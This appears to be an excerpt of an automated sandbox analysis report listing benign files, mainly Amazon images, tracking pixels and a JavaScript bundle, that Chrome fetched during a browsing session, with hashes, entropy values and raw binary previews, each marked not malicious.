                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!..1AQa"q...2.#BRr....3CSc..$...b...............................................!1...A2Q.b.3Ba............?......" .Z...f..e..s.........uker..[_..H..Z3r.k]P.B,.638..X$E..x..$.g..O..b.v....wC\...b...V8,].....B.3F.u...^.!...X(.Z....x....[`....:(..I`......|gQ...m...G..I!..5q.O@9...{Y..CT.{77.O..8.I.h<Ho.H....y^L..(.w.7LB.Y.d,s.i.....hu.|.....0....0=..F....r6F.0....`.<."...." ..."".....F..[rw...1.......g{c.5....X..@.....K.dm#...../l.p.g..om.j.k.P..(.p.(..q....v....s.h......'.w..G...j..F..)."&9..4p.Oa..\>I>.U.Q....P{/^.5.....v..$t..9,.QLg@?W...+..p....q.C..$6.[z.>.Z.y.8f..M8phnZ<K....O.....8..:..y...=..v$.*.1......_......E..6...Wm.P.o.P?ibN.O.......M.#..3.r*....$o...^.y....E=...UlA....`.6..:...[.dld..........wM..+.,S;.?6.Ds.lkl.A.U.8f....3.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 136 x 136, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):15427
                                                                                                                                                                                                                                                                Entropy (8bit):7.976208190934027
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:/H9c1vCJgz2GixyL8u6UmL1rUACEviw+sv+ADNRmkx44mliXd15:/CXixlubmhBqwJ+QTOKd15
                                                                                                                                                                                                                                                                MD5:D1BAE3D1E005483AC7872D49A442CC63
                                                                                                                                                                                                                                                                SHA1:196B857575A97F75028B876B924957E800BC1F43
                                                                                                                                                                                                                                                                SHA-256:72C57CDA41C26F93F43F16C230B7778E996A43AC7FA4D509CD473B3887596ADB
                                                                                                                                                                                                                                                                SHA-512:68C1C9CA3F5E3FCE687BAE77A7D922640FF9676B40A299CC66F5216F6C81BC2D6F1C32A2D9662E4673FEFB17B795E2DE920FBE3D49DF6716B68A0CB43071F1B3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://url6.mailanyone.net/static/media/scan-spinner.db8ef091.png
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.............<..R....sRGB.......;.IDATx..}.x\...VKj.....5.c..lLX.2Y...@.0..f.-3......Mf^.$L ....0..'L2.%.......l.[.,..-k.%.;..:..o_I-.......:Uu...v=.9.^|.E..?.DYK...I..ekr2..;04.j$...Q.OJL.$$$.B..eyG=.........y.FB..1............}=.>.Xm........C/.LOO.....:|..7..k...... ^{........MI.Y...SV..e.........P(d.F.Mf........d...F..O9+.6'.....................oo].pa..7..i..f6.... .x...5..HbR.....i.Y.).I.Q..\.\.T.\...._.. P.BF.~<.....I.....X.og.p......mK*.~......?....O>..m..G.9.K..\...O.........(h*..0.].hM.E..,n.....!...l....F.o....S.E.E.........$....{...._.._.....m.......}...H........!P.O......4......%j..O. ....@c".`.t...N.>{...|.Tg..... ..s....;9.l.54R.....E!.....F.Q.....(d7..0....>R.....c`.|5/F*.A../..WD.....;..e.}.....<........:..Y...Gi..wsJ~..f...<^.*....Y..p.eP.@.@P@....N...0.I..AKq*>.*U....'".:~zM......4...,....z..l...rV....(....../...WH. d.&_....a..d......Z.....a.CE.....#...qj^.....+'./.H..pv..F..+..|.....K...}...[...&.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):10986
                                                                                                                                                                                                                                                                Entropy (8bit):7.851920215796332
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:HX4wxjM+yuOeaUMkgrbXE32Buf4vWJ4cL4DL6v4fH9tPtrIr3xNQ2d:IIYJULAFuf4v24cL4DroBN7d
                                                                                                                                                                                                                                                                MD5:7FE9816543971BD4FD55FE77A46C1F94
                                                                                                                                                                                                                                                                SHA1:B742F4BE969F5B23C128E35AB1155E12A42A2072
                                                                                                                                                                                                                                                                SHA-256:C9DE7980EF94AECD277BAF8D01E4E50C7B0C8CAA5C32F7675CDE6D394BB876A4
                                                                                                                                                                                                                                                                SHA-512:ED561ADA6C8C732A579887A3F2535A41369B47D16764F0A91E6175E63FC6FDF5E2C5EDC076213D7BD12D5BE0D23647A9AEC4F3B73C2BC79A83FC032361D87E93
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................,..........,..\.w./.<.>.B.q=......R.}K3....#.p........................tx...;.T..|;...S.P....................~f.[.[...5'.-I. ..................y.K.+!.! ..........................y.M.)/!.. ..0.~...................)..e.....|..{.x......:...;S...T...............#.7..'`-..Y...F.=>k..vs....,..'3.m..:.F.._.zs..I..w....W?..>>....z.r.............!..]..k..a.S;...S-p..K(^._Kh-..Z.f4....lz>3.w.~...a.IJ. ............<.c..m.V.=q...y.ROD..}rZ..Z..+B......sCgD.....g.......}].0..........r~......-.Ya.Iz.......<4...I..l.z..?AC..{h..kN..+.r..|.Q..#...................v<.7YuU..@.[R.)PP..U(V.P.*J(..[.D....S>.........................m...uI.}M..T.h........}....7".!u..!..c.Y.Mt..:..2l.............cO;.:.....5jl0...]S.3....tGc......G
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26ctb%3D1%26sc0%3DjQueryPageShow%26cf0%3D41686%26pc0%3D41686%26ld0%3D41686%26t0%3D1723469044684%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41685
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 345x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):19450
                                                                                                                                                                                                                                                                Entropy (8bit):7.965391710412241
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:h2fK8Ehx9NLu5eNpGXqljSsVtUcBTebxPR/x9kNxjTIzJ:cgZtLpGkSsVtnBeb/DkN1Ta
                                                                                                                                                                                                                                                                MD5:546C125637F3A7A823637322468D5CED
                                                                                                                                                                                                                                                                SHA1:7B12AAB289D85DAD9AF1948508684C9BED8475CB
                                                                                                                                                                                                                                                                SHA-256:B0786D377038FF6C2E6C19D33A8036771865F4CB65BCBB77EDE8D31C5DC936E3
                                                                                                                                                                                                                                                                SHA-512:60FC51223187F96D9E177DFC3E915652DE71C323EE71B95E374F727AB56CFD19AB40D793F7C9FA197DB1BA2738651C0944B6880D70A779E15785431B3064A18D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........Y.."..........5..................................................................1..^.K.DRy..>R.|!...}=...h...o9..$..o...................<..KC/U...9_5..~.."K..K..,.T.*AW_.4.B...9"..{".`Uw\l.t... ..............y..e....u._'lx.."..?...j...v.XP..g.Z\.xD.$..hj..%.>.SG.G..kg]..|....&..b....k..1..N.h|...........[J...g.>....Q.....s`..;...ZJ..i...CU....i.r$.l.....6..qs.=W6..uc...........T...9.."jb.....7./.5...n9....^...i..../b.K.N.J.R.J.e.>.j..g..{.(..........).i..34....-`.d..(V...d.nQ.|.)......V......G.f.j.$......Y.-$.>GK...-.O[uF^......>}...Q2.......!u.\.....(..O2.g?.....w....U,.f.].".*.}..aQQ.;d.q.__.g...v.....V...m&.a.;.(..'.y...s.KyQ.z.i...G.]:.....Q..8...s)....no\:..y...hGWhZ.EI(`...\.I..D.V'a.s4.&.U..-)p...P..gfvs\..fvt.7h.(`w..Y..F..[.s.[~...[.t.c.....C_3..<u1V{....=i5.\j.Z...0
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):25884
                                                                                                                                                                                                                                                                Entropy (8bit):7.954606259341486
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:geoRgrqX77nFqp3FPZ5vwSKPwHGA3C+YifpmV+hRqbrxI:3oR3W3FPZpqAYum4zMrG
                                                                                                                                                                                                                                                                MD5:73DB4D96DAE8D748B5511183800A2990
                                                                                                                                                                                                                                                                SHA1:A4E1398CA951E2A4CD6D96A8269A58DC039D398C
                                                                                                                                                                                                                                                                SHA-256:ED3BAA78123AA2DAB0BDEA5A5115A4398F6E8CD82494E149BB363C8559A4EF3C
                                                                                                                                                                                                                                                                SHA-512:5F50D3CCC69FAB246DEE702B800D19DB8F77870A4CB891A25FFEA3C9E710718AA2F4168A1DE20248AFCF9249AA65ECB8B4343510AF028DBC5A402B16AB5C436B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/71dwE8Ob46L._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5..................................................................,.............z..w.=.... .................!V.NT.r.?...m|wU...l....O..Rz....U~........y.B.@.............Q.sg.......eL<._n...U..z..#..>..#_y.a.$.Qo..+_.=G}..+.c.W..A..t>_....W./....................i[l.h1.I..._..vo..c.c.NHY:..v..iZ..E....p^I..._...z.|..,..F....w....f............_..h7.q..g..r..gqd..)ZLZ..F.z.v...i....u......W..m......fL2...[.5."+7MJ.~..D~.5N.=....."R..l...F4....V..E.J..5..s.+..l6./.R.^)U.[p..j#........N....OS..I...f[..]'.,..zK"R..2.k.......;7'5. ..r..?.{m..y>..R[.....u.K..o.....lrR..+J.iJ.....M<.z....{=9.X]m...K..Y}eJ...+cK........D.Q..s......N...........j;{..qW. ...1>..=...j...4..+K.5....5,......6wj....4.eu.4.)rkK*F.>.9k....:..W.U.Uq...dO.E.*...G.W.....<.%.=..J.).)Mm..kY.Q.....s`......
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2589
                                                                                                                                                                                                                                                                Entropy (8bit):7.7712717716698
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6X5JulF+VOBl603eLHbETbhhmn1i2APiLb3geYVHq:Tf5JgL3YMbqI2APKb3AVK
                                                                                                                                                                                                                                                                MD5:8C6776BF2CFA22C6AFEACADE6CC45D99
                                                                                                                                                                                                                                                                SHA1:D9C5945B48E04C9E5CEEAE97851B3B8259F85956
                                                                                                                                                                                                                                                                SHA-256:AE2BE6C7E77EC1E0490D5DD7CC2DD64EC7F0BB7C1793890CD56AA0EF3860D99D
                                                                                                                                                                                                                                                                SHA-512:B06A69B39A59C4B386B2ADF09F45AC180E67A3FF61844D208424990E5E4A7BBAF2831EA77262217EA68C81EB4985C5FB201F2714516F0D89AB17A015B959CA69
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..................................................................!1AQ."aq...RS....#2r...$3CUb...................................................!..134Qq...."A..Ba.............?..."q.........................................wlzqk..l....,..<...xEa.A2\8=.Z........r.Q....A._Y......D...C.Vn.:..Z.?`..3.......k.ed.U.H..d..<J.^...9...p(...wW.S~:.W.u..L...6...C.......f..F...'@.....$.]N.U-.CU...{..L;.:.......?Mu.l/6........-.....V_.-.;.``.Z...ZU..K{1....../..<".A....f.vUQ....H.oE....G...LM.....YCr.h.m.....'...Q/..y<.J_>.e...b...UC.2..T.{<..R..L4.l..LsX..,....8.K."&#L..................Yx.c.....2.*..H..%.+?....#......?.....qvU....9Ks.4.>....~S.;.C.).z..Oo7..3....1.0*{.s.r.(.....!X...Z..K...k.}J..g..vB/.H..Q;].U/..X....BA_.Z}0...X.....Q}.....)6..4.V._..].;..S.......=E9>g.P..2..........w......}...s..Du..y
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 255x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):10379
                                                                                                                                                                                                                                                                Entropy (8bit):7.93619350611049
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:tt5J8r8Z/QNtwjYp1WUFxtUWaUp8/zwRKxMImWgcP2+7QFo59ecNumm9:ttAr2mtwSLtUWrpbRmMpGP2+x9Ml9
                                                                                                                                                                                                                                                                MD5:ACD6DCD05168CDACBD67A3CB9CD590EE
                                                                                                                                                                                                                                                                SHA1:01EFF5E52E3C10030FC2F8F0549076D4C157E110
                                                                                                                                                                                                                                                                SHA-256:7959A6523B868AA405E0D5515429504235C878216492CDF6A039E6DD9E7E4243
                                                                                                                                                                                                                                                                SHA-512:115B86390058FAFA260E4994DB76CB56B07A6CA8FE2902AA17C673C61A172BD4A40F3F294B168DFB895600D2F74B6B2F56C48EF5BD2F451C71C9F7A23D155218
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61tt9VVcfFL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................,..........X...,b.i...Z......;.0.O..R........RU1..8.P....&&...i+.PtZ]...E.J..J..{...2.z...T[..;....'x.X..u*.-...z....-..1u[#....r."..1....;.........q.d..\i.x,I"+.3..o.<s.~..RR.....Z.0.]b'.1...<..c.v.<%h....\Bm9A...............o....IZUz.v...T.......U..o.....&$N?...>1..EDk..-......#.-..U.C+K.6K...r...=.g...j...m.. Q.6.if]o...../.[.~..5.I".........m....t.....zL9..N.........R{U..y..K....;i...}....t..p..Q:.f.....1....kkk.g.Y..x.-s.9|.hj.=6 ..H2...I...W^.:b.......I.....0g.W y..1..3<g6N../..\...........Z.1t.o5E..}{([.s.+)..j..[..5.v..:...%....-{F..!1...A.(..'....o.....+M.{5.^.T....O.Vcs.....H.?..cq..z....j...k..G.|v..c^{.......&.].2.F........,.u.].c..G[.Y....<.f,........#Q..E.Y...vy.y/h..kn.gZu.;...6r..-...,c...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):285
                                                                                                                                                                                                                                                                Entropy (8bit):3.992477276923708
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7hHx7qC0o26Z+aW6Hri/aliltjDtqRXhP/lYYms9:7vTtRWPtsh/lz
                                                                                                                                                                                                                                                                MD5:B1DF542B3846358E48A00920727A87EB
                                                                                                                                                                                                                                                                SHA1:B3E8EE8554DA24238553747F8B2656739AD00FFD
                                                                                                                                                                                                                                                                SHA-256:733E9DF98B6072B548E0D75DDAE41F62B4EB20996D3C06588B78D9963F57DB94
                                                                                                                                                                                                                                                                SHA-512:3281B4C63BBADB693CC73281197675FCC8FBCB0671DE59C6F525C054C19EF274EC6738E872559FB077758406C7982E478C3B9F6D3C30A73DAF0E1716220C94F2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................................................................?...$..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6862
                                                                                                                                                                                                                                                                Entropy (8bit):7.7359775068235015
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TaloWNsmm+gOrYb9oYbZnh7sGgyyWQzT+fX9KLPGJ+F5/s+2p/DGUXYMC:GlY/IS9oOgyyHjM+4+2p/6cC
                                                                                                                                                                                                                                                                MD5:D0A4AC685EB6546F8F8ACD6EC10618F9
                                                                                                                                                                                                                                                                SHA1:1A4B0B7CF98FA2F1438CAF0AB4930B4F73D92E3A
                                                                                                                                                                                                                                                                SHA-256:CAEE49C8542967F1CA07F60132B755270EF1C5D40B1D7549679C46F3D3E1517A
                                                                                                                                                                                                                                                                SHA-512:D61D4898FABBF238A4B06FE45F6D67F53167AE694A7056FE8D90AF7DC964D59EE21B38899FB18A09AD58047CBDB414B1983EF94A072832F18BAF021735C53621
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........4...........................................................................i.b........zu8...................k........^..U.Lu....................j...N;.{.Z..C.]$v....................s.OR.:..K=.......?...........................d...ps.............................{........{.l.WI.....L/.j.....................y......e..............H.1...................^.......r...Y..n.......l:.s...6..a..upZ..................L..dO..:.....y9........#. \s.]...q.V..~.....................EoZ.....v..x.....<....9....s&".q..........9.UB@...................i..z..]...%...e#..^v&}b.1.-...S.R.|y.H...............S.T..U..'.W.>..wM/;....R.U..f.!..?.&l......................U-u\...>......{`Ga..R4...rt.V..=.m.><..$.....................n.%,0...FHGQ.....}..... '.b6.... ...............V.V.4..u.ib.....q..2.'".&".9J.m..~z.9w..H
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):1467054
                                                                                                                                                                                                                                                                Entropy (8bit):5.960621784851465
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:VDSWZhjZ3LSqo6aJ8jMRIFxLIJKUYZd6SPfS2dHy1D30YJmpoUM0f3jlllQRquMK:NBZhjpSl6aJjbnm3QlD
                                                                                                                                                                                                                                                                MD5:0F816DCC640E8E61CD91D8FECD506239
                                                                                                                                                                                                                                                                SHA1:80A38CE38F0ED430F527074B01A5987283E4C036
                                                                                                                                                                                                                                                                SHA-256:E74F63C33D04C3C10ACEB422221B019D0B5FA9E8C798C576E9E9DF848C26205D
                                                                                                                                                                                                                                                                SHA-512:6B78E6575C493A995B9D01CB9E727085144B349062FDF3A984B2063C05AFC0FA7B93F9F2B016F86817BD21697E236F47E4401A5F4DD8A24DED279ACC3B32D63E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/A1fXNtoo+RL.js?AUIClients/ACICAssets
                                                                                                                                                                                                                                                                Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("ACICAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET ACICAssets - 1.0./////////////////////////.// BEGIN FILE js/acic.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/./******
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):285
                                                                                                                                                                                                                                                                Entropy (8bit):3.992477276923708
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7hHx7qC0o26Z+aW6Hri/aliltjDtqRXhP/lYYms9:7vTtRWPtsh/lz
                                                                                                                                                                                                                                                                MD5:B1DF542B3846358E48A00920727A87EB
                                                                                                                                                                                                                                                                SHA1:B3E8EE8554DA24238553747F8B2656739AD00FFD
                                                                                                                                                                                                                                                                SHA-256:733E9DF98B6072B548E0D75DDAE41F62B4EB20996D3C06588B78D9963F57DB94
                                                                                                                                                                                                                                                                SHA-512:3281B4C63BBADB693CC73281197675FCC8FBCB0671DE59C6F525C054C19EF274EC6738E872559FB077758406C7982E478C3B9F6D3C30A73DAF0E1716220C94F2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/G/01/msa/vowels/metrics._STID178985-1723469074369_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................................................................?...$..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9263
                                                                                                                                                                                                                                                                Entropy (8bit):7.878352555031742
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:yg6a3IReuOpD6skKWGmiRjJIK3ik1x+C+1QPzdh6mnsq1WZlm5Zp713uC:yg6a3GOcQ9BOsfx+91QPZh6csZs5Zt1V
                                                                                                                                                                                                                                                                MD5:833C9AF2440CB4022FE81BE0D4A733A2
                                                                                                                                                                                                                                                                SHA1:8CA1B09B5409D2E328BEB319A3BCA7DA61D866E4
                                                                                                                                                                                                                                                                SHA-256:AC1CADF44D0BAC351155FBE4E3115ABAF0AEE778D130C96AB4A55D53220FFE24
                                                                                                                                                                                                                                                                SHA-512:0F92197D9807F2632C34AAE0930A2470070B4D033389DB504F720625AD67BC38EC4C86A05B51E33C1D9F7457BFA9FCB97F0310F6056A52484071973CC363D20E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........2...............................................................,.R........{...9.G.4s.............J2/...../...i.0...t..'..g.................FE....R....8Wv...Y....<}..w.l...........%......K.........u...2..t..........................0'.@........C.@...........Q.x.....8..G5..{....B)..]...s.QZ..=..p........%.......an..z.V.r].H....6.56...K....WY..Cr.[.f.S..~..@..`.........d^....<.R..!;x....voo...]...g.....j.n.....Z..~..z............Q.x.....z..`..Nu..F..E.\.....4...!+e:.,.Z...........FE....R.....l..l.:K.w"AZ..*..:.TR...+'..9..@............"....)b.......6q..cJ]!..K....T..s..}=..b....y.,..zN...q.:.....U:#..:#....y..d..Sd...%......K.....H....3iz...IUT.....2).j_A.X=.D.yyFk.fDm[2..2...5.."4....M...[.L.#Y.(.....X.`....2.Q.Fm..s..k...F.3z..?..K..~.}=........n.8dc.>...2z..e....o ../Y....,.X.u.V.lm
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
